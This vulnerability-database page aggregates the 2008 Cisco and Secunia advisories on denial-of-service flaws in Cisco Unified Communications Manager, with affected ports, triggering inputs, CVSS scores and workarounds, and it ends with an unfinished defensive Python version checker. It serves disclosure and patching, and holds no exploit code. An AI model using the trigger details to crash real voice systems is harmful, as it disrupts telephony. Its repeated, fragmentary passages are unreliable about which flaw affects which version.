KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
A stand-alone copy or Paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.
Distribution
============
This advisory is posted on Cisco's worldwide website at:
http://www.cisco.com/warp/public/707/cisco-sa-20080514-cucmdos.shtml
In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.
* cust-security-announce@cisco.com
* first-teams@first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com
Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on
mailing lists or newsgroups. Users concerned about this problem are
encouraged to check the above URL for any updates.
Revision History
================
+-----------------------------------------------------------+
| Revision 1.0 | 2008-May-14 | Initial public release |
+-----------------------------------------------------------+
Cisco Security Procedures
=========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html.
This includes instructions for press inquiries regarding Cisco security notices.
All Cisco security advisories are available at http://www.cisco.com/go/psirt.
-----BEGIN PGP SIGNATURE-----
iD8DBQFIKw3c86n/Gc8U/uARAo4iAJ461QSdwp9yXivfv/yWe4Xlj2wNaACcD/nW
GpnghuWFfH2gIjp6Yk6857c=
=L6xn
-----END PGP SIGNATURE-----
VAR-200805-0208 | CVE-2008-1744 | Cisco Unified Communications Manager (CUCM) Service Disruption (DoS) Vulnerabilities |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
The Certificate Authority Proxy Function (CAPF) service in Cisco Unified Communications Manager (CUCM) 4.1 before 4.1(3)SR7, 4.2 before 4.2(3)SR4, and 4.3 before 4.3(2) allows remote attackers to cause a denial of service (service crash) via malformed network traffic, aka Bug ID CSCsk46770. A denial of service (DoS) vulnerability exists in Cisco Unified Communications Manager (CUCM). This issue is tracked as Bug ID CSCsk46770. Please refer to the "Overview" for the impact of this vulnerability.
These issues affect the following components:
Certificate Trust List (CTL) Provider
Certificate Authority Proxy Function (CAPF)
Session Initiation Protocol (SIP)
Simple Network Management Protocol (SNMP) Trap
An attacker can exploit these issues to cause denial-of-service conditions in the affected application.
----------------------------------------------------------------------
This vulnerability is reported in version 5.x.
2) Another error within the CTL Provider service can be exploited to
consume large amounts of memory resources via a series of specially
crafted packets sent to default port 2444/TCP.
This vulnerability is reported in versions 5.x and 6.x.
This vulnerability is reported in versions 4.1, 4.2, and 4.3.
This vulnerability is reported in versions 5.x and 6.x.
This vulnerability is reported in versions 4.1, 4.2, 4.3, 5.x, and
6.x.
SOLUTION:
Update to the fixed versions.
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
http://www.cisco.com/warp/public/707/cisco-sa-20080514-cucmdos.shtml
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
These vulnerabilities were discovered internally by Cisco. Workarounds
that mitigate some of these vulnerabilities are available.
This advisory is posted at
http://www.cisco.com/warp/public/707/cisco-sa-20080514-cucmdos.shtml.
The software version can also be determined by running the command
show version active via the command line interface (CLI).
No other Cisco products are currently known to be
affected by these vulnerabilities.
Details
=======
Cisco Unified Communications Manager is the call processing component
of the Cisco IP Telephony solution that extends enterprise telephony
features and functions to packet telephony network devices, such as
IP phones, media processing devices, voice-over-IP (VoIP) gateways,
and multimedia applications. The CTL Provider service listens
by default on TCP port 2444 and is user configurable. The CTL
Provider service is enabled by default. There is a workaround for
this vulnerability. The CTL Provider service listens by default on
TCP port 2444 and is user configurable. There is a workaround for
this vulnerability. The CAPF service listens by default on TCP port 3804 and
is user configurable. The CAPF service is disabled by default. There
is a workaround for this vulnerability. There is no workaround for this
vulnerability. There is no workaround for
this vulnerability. There is no workaround for
this vulnerability. The SNMP Trap Agent service listens by default on
UDP port 61441. There is a workaround for this vulnerability.
Vulnerability Scoring Details
=============================
Cisco has provided scores for the vulnerabilities in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this Security Advisory is done in accordance with CVSS
version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.
Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding
CVSS at:
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html
Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at:
http://intellishield.cisco.com/security/alertmanager/cvss
* CSCsj80609 - Memory Leak Due to TCPFUZZ on Port 2444 (CTLProvider)
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCsi98433 - CTLProvider leaks memory in certain scenarios
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCsk46770 - CAPF crash with network traffic
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCsi48115 - CM 6.1 stops providing service when receiving malformed Join sip-header
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCsk46944 - CCM service restarts on receiving a valid SIP Packet
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCsl22355 - CCM does not validate SIP URL input properly
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCsj24113 - CCM Process Coredump/Restart During ISIC Execution Against Port 61441
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
Impact
======
Successful exploitation of the vulnerabilities in this advisory may
result in the interruption of voice services.
Software Versions and Fixes
===========================
When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to
determine exposure and a complete upgrade solution.
In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.
It can be downloaded at the following link:
http://www.cisco.com/pcgi-bin/tablebuild.pl/callmgr-61?psrtdcat20e2
Workarounds
===========
CTL Provider Related Vulnerabilities
To mitigate against the CTL Provider service vulnerabilities
(CSCsj80609 and CSCsi98433), system administrators can disable the
CTL Provider service if it is not needed. The CTL Provider service is controlled via the Cisco CTL
Provider menu selection.
It is possible to mitigate the CTL Provider vulnerabilities by
implementing filtering on screening devices. If the CTL Provider
service is enabled, permit access to TCP port 2444 only between the
Cisco Unified Communications Manager systems where the CTL Provider
service is active and the CTL Client, usually on the administrator's
workstation, to mitigate the CTL Provider service overflow.
Note: It is possible to change the default port of the CTL Provider
service (TCP port 2444). If changed, filtering should be based on the
values used.
CAPF Related Vulnerability
To mitigate against the CAPF service vulnerability (CSCsk46770),
system administrators can disable the CAPF service if it is not
needed. If phones are not
configured to use certificates, then the CAPF service can be
disabled.
It is possible to mitigate the CAPF vulnerability by implementing
filtering on screening devices. If the CAPF service is enabled,
permit access to TCP port 3804 only from networks that contain IP
phone devices needing to utilize the CAPF service.
SIP-Related Vulnerabilities
It is possible to mitigate the SIP vulnerabilities by implementing
filtering on screening devices.
SNMP Trap-Related Vulnerability
To mitigate against the SNMP Trap service vulnerability (CSCsj24113),
system administrators can disable the SNMP Trap service. To disable the
Windows SNMP service, navigate to Start > Programs > Administrative
Tools > Services, and stop the SNMP Service.
Note: The SNMP Trap Service listed in the Windows Service
configuration screen is not applicable to this vulnerability and
disabling it does not provide any benefit as a workaround for this
vulnerability.
It is possible to mitigate the SNMP Trap service vulnerability by
implementing filtering on screening devices. Permit access to UDP
port 61441 only from management systems that need access to the SNMP
Trap service.
Prior to deploying software, customers should consult their
maintenance provider or check the software for feature set
compatibility and known issues specific to their environment.
Customers may only install and expect support for the feature sets
they have purchased. By installing, downloading, accessing or
otherwise using such software upgrades, customers agree to be bound
by the terms of Cisco's software license terms found at
http://www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html,
or as otherwise set forth at Cisco.com Downloads at
http://www.cisco.com/public/sw-center/sw-usingswc.shtml.
Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.
Customers with Service Contracts
+-------------------------------
Customers with contracts should obtain upgraded software through
their regular update channels. For most customers, this means that
upgrades should be obtained through the Software Center on Cisco's
worldwide website at http://www.cisco.com.
Customers using Third Party Support Organizations
+------------------------------------------------
Customers whose Cisco products are provided or maintained through
prior or existing agreements with third-party support organizations,
such as Cisco Partners, authorized resellers, or service providers
should contact that support organization for guidance and assistance
with the appropriate course of action in regards to this advisory.
The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or
fix is the most appropriate for use in the intended network before it
is deployed.
Customers without Service Contracts
+----------------------------------
Customers who purchase direct from Cisco but do not hold a Cisco
service contract, and customers who purchase through third-party
vendors but are unsuccessful in obtaining fixed software through
their point of sale should acquire upgrades by contacting the Cisco
Technical Assistance Center (TAC). TAC contacts are as follows.
* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@cisco.com
Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to
a free upgrade. Free upgrades for non-contract customers must be
requested through the TAC.
Refer to http://www.cisco.com/warp/public/687/Directory/DirTAC.shtml
for additional TAC contact information, including localized telephone
numbers, and instructions and e-mail addresses for use in various
languages.
Exploitation and Public Announcements
=====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerabilities described in this advisory.
These vulnerabilities were discovered internally by Cisco.
Status of this Notice: FINAL
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
A stand-alone copy or Paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.
Distribution
============
This advisory is posted on Cisco's worldwide website at:
http://www.cisco.com/warp/public/707/cisco-sa-20080514-cucmdos.shtml
In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.
* cust-security-announce@cisco.com
* first-teams@first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com
Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on
mailing lists or newsgroups. Users concerned about this problem are
encouraged to check the above URL for any updates.
Revision History
================
+-----------------------------------------------------------+
| Revision 1.0 | 2008-May-14 | Initial public release |
+-----------------------------------------------------------+
Cisco Security Procedures
=========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html.
This includes instructions for press inquiries regarding Cisco security notices.
All Cisco security advisories are available at http://www.cisco.com/go/psirt.
-----BEGIN PGP SIGNATURE-----
iD8DBQFIKw3c86n/Gc8U/uARAo4iAJ461QSdwp9yXivfv/yWe4Xlj2wNaACcD/nW
GpnghuWFfH2gIjp6Yk6857c=
=L6xn
-----END PGP SIGNATURE-----
VAR-200805-0209 | CVE-2008-1745 | Cisco Unified Communications Manager (CUCM) Service Disruption (DoS) Vulnerabilities |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
Cisco Unified Communications Manager (CUCM) 5.x before 5.1(2) and 6.x before 6.1(1) allows remote attackers to cause a denial of service (service interruption) via a SIP JOIN message with a malformed header, aka Bug ID CSCsi48115. A denial of service (DoS) vulnerability exists in Cisco Unified Communications Manager (CUCM). This issue is tracked as Bug ID CSCsi48115. Please refer to the "Overview" for the impact of this vulnerability.
These issues affect the following components:
Certificate Trust List (CTL) Provider
Certificate Authority Proxy Function (CAPF)
Session Initiation Protocol (SIP)
Simple Network Management Protocol (SNMP) Trap
An attacker can exploit these issues to cause denial-of-service conditions in the affected application. ----------------------------------------------------------------------
This vulnerability is reported in version 5.x.
2) Another error within the CTL Provider service can be exploited to
consume large amounts of memory resources via a series of specially
crafted packets sent to default port 2444/TCP.
This vulnerability is reported in versions 5.x and 6.x.
This vulnerability is reported in versions 4.1, 4.2, and 4.3.
This vulnerability is reported in versions 5.x and 6.x.
This vulnerability is reported in versions 4.1, 4.2, 4.3, 5.x, and
6.x.
SOLUTION:
Update to the fixed versions.
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
http://www.cisco.com/warp/public/707/cisco-sa-20080514-cucmdos.shtml
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keep their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
These vulnerabilities were discovered internally by Cisco. Workarounds
that mitigate some of these vulnerabilities are available.
This advisory is posted at
http://www.cisco.com/warp/public/707/cisco-sa-20080514-cucmdos.shtml.
The software version can also be determined by running the command
show version active via the command line interface (CLI).
No other Cisco products are currently known to be affected by these
vulnerabilities.
Details
=======
Cisco Unified Communications Manager is the call processing component
of the Cisco IP Telephony solution that extends enterprise telephony
features and functions to packet telephony network devices, such as
IP phones, media processing devices, voice-over-IP (VoIP) gateways,
and multimedia applications. The CTL Provider service listens
by default on TCP port 2444 and is user configurable. The CTL
Provider service is enabled by default. There is a workaround for
this vulnerability. The CTL Provider service listens by default on
TCP port 2444 and is user configurable. There is a workaround for
this vulnerability.
Certificate Authority Proxy Function Related Vulnerability
The Certificate Authority Proxy Function (CAPF) service of Cisco
Unified Communications Manager versions 4.1, 4.2 and 4.3 contain a
vulnerability when handling malformed input that may result in a DoS
condition. The CAPF service listens by default on TCP port 3804 and
is user configurable. The CAPF service is disabled by default. There
is a workaround for this vulnerability. There is no workaround for this
vulnerability. There is no workaround for
this vulnerability. There is no workaround for
this vulnerability. The SNMP Trap Agent service listens by default on
UDP port 61441. There is a workaround for this vulnerability.
Vulnerability Scoring Details
=============================
Cisco has provided scores for the vulnerabilities in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this Security Advisory is done in accordance with CVSS
version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.
Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding
CVSS at:
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html
Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at:
http://intellishield.cisco.com/security/alertmanager/cvss
* CSCsj80609 - Memory Leak Due to TCPFUZZ on Port 2444 (CTLProvider)
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCsi98433 - CTLProvider leaks memory in certain scenarios
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCsk46770 - CAPF crash with network traffic
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCsi48115 - CM 6.1 stops providing service when receiving malformed Join sip-header
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCsk46944 - CCM service restarts on receiving a valid SIP Packet
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCsl22355 - CCM does not validate SIP URL input properly
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCsj24113 - CCM Process Coredump/Restart During ISIC Execution Against Port 61441
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
Impact
======
Successful exploitation of the vulnerabilities in this advisory may
result in the interruption of voice services.
Software Versions and Fixes
===========================
When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to
determine exposure and a complete upgrade solution.
In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance. It can be downloaded at the
following link:
http://www.cisco.com/pcgi-bin/tablebuild.pl/callmgr-61?psrtdcat20e2
Workarounds
===========
CTL Provider Related Vulnerabilities
To mitigate against the CTL Provider service vulnerabilities
(CSCsj80609 and CSCsi98433), system administrators can disable the
CTL Provider service if it is not needed. The CTL Provider service
is controlled via the Cisco CTL Provider menu selection.
It is possible to mitigate the CTL Provider vulnerabilities by
implementing filtering on screening devices. If the CTL Provider
service is enabled, permit access to TCP port 2444 only between the
Cisco Unified Communications Manager systems where the CTL Provider
service is active and the CTL Client, usually on the administrator's
workstation, to mitigate the CTL Provider service overflow.
Note: It is possible to change the default port of the CTL Provider
service (TCP port 2444). If changed, filtering should be based on the
values used.
CAPF Related Vulnerability
To mitigate against the CAPF service vulnerability (CSCsk46770),
system administrators can disable the CAPF service if it is not
needed. If phones are not
configured to use certificates, then the CAPF service can be
disabled. The CAPF service is controlled by the Cisco Certificate
Authority Proxy Function menu selection.
It is possible to mitigate the CAPF vulnerability by implementing
filtering on screening devices. If the CAPF service is enabled,
permit access to TCP port 3804 only from networks that contain IP
phone devices needing to utilize the CAPF service.
SIP-Related Vulnerabilities
It is possible to mitigate the SIP vulnerabilities by implementing
filtering on screening devices.
SNMP Trap-Related Vulnerability
To mitigate against the SNMP Trap service vulnerability (CSCsj24113),
system administrators can disable the SNMP Trap service. To disable the
Windows SNMP service, navigate to Start > Programs > Administrative
Tools > Services, and stop the SNMP Service.
Note: The SNMP Trap Service listed in the Windows Service
configuration screen is not applicable to this vulnerability and
disabling it does not provide any benefit as a workaround for this
vulnerability.
It is possible to mitigate the SNMP Trap service vulnerability by
implementing filtering on screening devices. Permit access to UDP
port 61441 only from management systems that need access to the SNMP
Trap service.
Prior to deploying software, customers should consult their
maintenance provider or check the software for feature set
compatibility and known issues specific to their environment.
Customers may only install and expect support for the feature sets
they have purchased. By installing, downloading, accessing or
otherwise using such software upgrades, customers agree to be bound
by the terms of Cisco's software license terms found at
http://www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html,
or as otherwise set forth at Cisco.com Downloads at
http://www.cisco.com/public/sw-center/sw-usingswc.shtml.
Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.
Customers with Service Contracts
+-------------------------------
Customers with contracts should obtain upgraded software through
their regular update channels. For most customers, this means that
upgrades should be obtained through the Software Center on Cisco's
worldwide website at http://www.cisco.com.
Customers using Third Party Support Organizations
+------------------------------------------------
Customers whose Cisco products are provided or maintained through
prior or existing agreements with third-party support organizations,
such as Cisco Partners, authorized resellers, or service providers
should contact that support organization for guidance and assistance
with the appropriate course of action in regards to this advisory.
The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or
fix is the most appropriate for use in the intended network before it
is deployed.
Customers without Service Contracts
+----------------------------------
Customers who purchase direct from Cisco but do not hold a Cisco
service contract, and customers who purchase through third-party
vendors but are unsuccessful in obtaining fixed software through
their point of sale should acquire upgrades by contacting the Cisco
Technical Assistance Center (TAC). TAC contacts are as follows.
* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@cisco.com
Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to
a free upgrade. Free upgrades for non-contract customers must be
requested through the TAC.
Refer to http://www.cisco.com/warp/public/687/Directory/DirTAC.shtml
for additional TAC contact information, including localized telephone
numbers, and instructions and e-mail addresses for use in various
languages.
Exploitation and Public Announcements
=====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerabilities described in this advisory.
These vulnerabilities were discovered internally by Cisco.
Status of this Notice: FINAL
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
A stand-alone copy or Paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.
Distribution
============
This advisory is posted on Cisco's worldwide website at:
http://www.cisco.com/warp/public/707/cisco-sa-20080514-cucmdos.shtml
In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.
* cust-security-announce@cisco.com
* first-teams@first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com
Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on
mailing lists or newsgroups. Users concerned about this problem are
encouraged to check the above URL for any updates.
Revision History
================
+---------------------------------------+
| Revision 1.0 | 2008-May-14 | Initial public release |
+---------------------------------------+
Cisco Security Procedures
=========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html.
This includes instructions for press inquiries regarding Cisco security notices.
All Cisco security advisories are available at http://www.cisco.com/go/psirt.
VAR-200805-0210 | CVE-2008-1746 | Cisco Unified Communications Manager (CUCM) Denial of Service (DoS) Vulnerability |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
The SNMP Trap Agent service in Cisco Unified Communications Manager (CUCM) 4.1 before 4.1(3)SR6, 4.2 before 4.2(3)SR3, 4.3 before 4.3(2), 5.x before 5.1(3), and 6.x before 6.1(1) allows remote attackers to cause a denial of service (core dump and service restart) via a series of malformed UDP packets, as demonstrated by the IP Stack Integrity Checker (ISIC), aka Bug ID CSCsj24113. Cisco Unified Communications Manager (CUCM) contains a denial of service (DoS) vulnerability. The problem is tracked as Bug ID CSCsj24113. Please refer to the "Overview" for the impact of this vulnerability.
These issues affect the following components:
Certificate Trust List (CTL) Provider
Certificate Authority Proxy Function (CAPF)
Session Initiation Protocol (SIP)
Simple Network Management Protocol (SNMP) Trap
An attacker can exploit these issues to cause denial-of-service conditions in the affected application. Cisco tracks this issue as Bug ID CSCsj24113. ----------------------------------------------------------------------
VAR-200805-0211 | CVE-2008-1747 | Cisco Unified Communications Manager Denial of Service (DoS) Vulnerability |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
Unspecified vulnerability in Cisco Unified Communications Manager 4.1 before 4.1(3)SR6, 4.2 before 4.2(3)SR3, 4.3 before 4.3(2), 5.x before 5.1(3), and 6.x before 6.1(1) allows remote attackers to cause a denial of service (CCM service restart) via an unspecified SIP INVITE message, aka Bug ID CSCsk46944. Cisco Unified Communications Manager contains an unspecified denial of service (DoS) vulnerability. The problem is tracked as Bug ID CSCsk46944. Please refer to the "Overview" for the impact of this vulnerability.
These issues affect the following components:
Certificate Trust List (CTL) Provider
Certificate Authority Proxy Function (CAPF)
Session Initiation Protocol (SIP)
Simple Network Management Protocol (SNMP) Trap
An attacker can exploit these issues to cause denial-of-service conditions in the affected application. The vulnerability stems from the failure of the network system or product to properly validate the input data. ----------------------------------------------------------------------
This vulnerability is reported in version 5.x.
2) Another error within the CTL Provider service can be exploited to
consume large amounts of memory resources via a series of specially
crafted packets sent to default port 2444/TCP.
This vulnerability is reported in versions 5.x and 6.x.
This vulnerability is reported in versions 4.1, 4.2, and 4.3.
This vulnerability is reported in versions 5.x and 6.x.
This vulnerability is reported in versions 4.1, 4.2, 4.3, 5.x, and
6.x.
SOLUTION:
Update to the fixed versions.
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
http://www.cisco.com/warp/public/707/cisco-sa-20080514-cucmdos.shtml
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
These vulnerabilities were discovered internally by Cisco. Workarounds
that mitigate some of these vulnerabilities are available.
This advisory is posted at
http://www.cisco.com/warp/public/707/cisco-sa-20080514-cucmdos.shtml.
The software version can also be determined by running the command
show version active via the command line interface (CLI). No other
Cisco products are currently known to be affected by these
vulnerabilities.
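The CVE descriptions on this page give the first fixed release of each train, and the advisory says the running version can be read with show version active. The Python below is an added example, not code from Cisco or Secunia, that compares a version string against those thresholds for both CVE-2008-1747 (CSCsk46944) and CVE-2008-1748 (CSCsl22355), whose 4.1 and 4.2 fixes differ by one service release. It assumes two input formats: the 4.1(3)SR6 notation used in the CVE text, and a dotted appliance form such as 6.1.1.2000-3, optionally prefixed by "Active Master Version:"; that prefix and the dotted form are assumptions about the CLI output, not something the advisory states.

```python
"""Added example (not part of the Cisco or Secunia advisory text).

Checks a Cisco Unified Communications Manager version string against the
first fixed release of each train named in the CVE descriptions on this
page, for both CVE-2008-1747 (CSCsk46944) and CVE-2008-1748 (CSCsl22355).
Accepted formats (assumptions, not stated by the advisory):
  * "4.1(3)SR6" / "4.3(2)"  - the notation used in the CVE text for 4.x
  * "6.1.1.2000-3"          - dotted appliance form, optionally prefixed
                              by "Active Master Version:" as printed by
                              `show version active` on 5.x/6.x
"""
import re

# (major, minor, maintenance, service release) of the first fixed release.
# Service release 0 means the base maintenance release itself.
# Keys are (major, minor) for 4.x trains and (major, None) for 5.x/6.x.
FIXED = {
    "CVE-2008-1747": {
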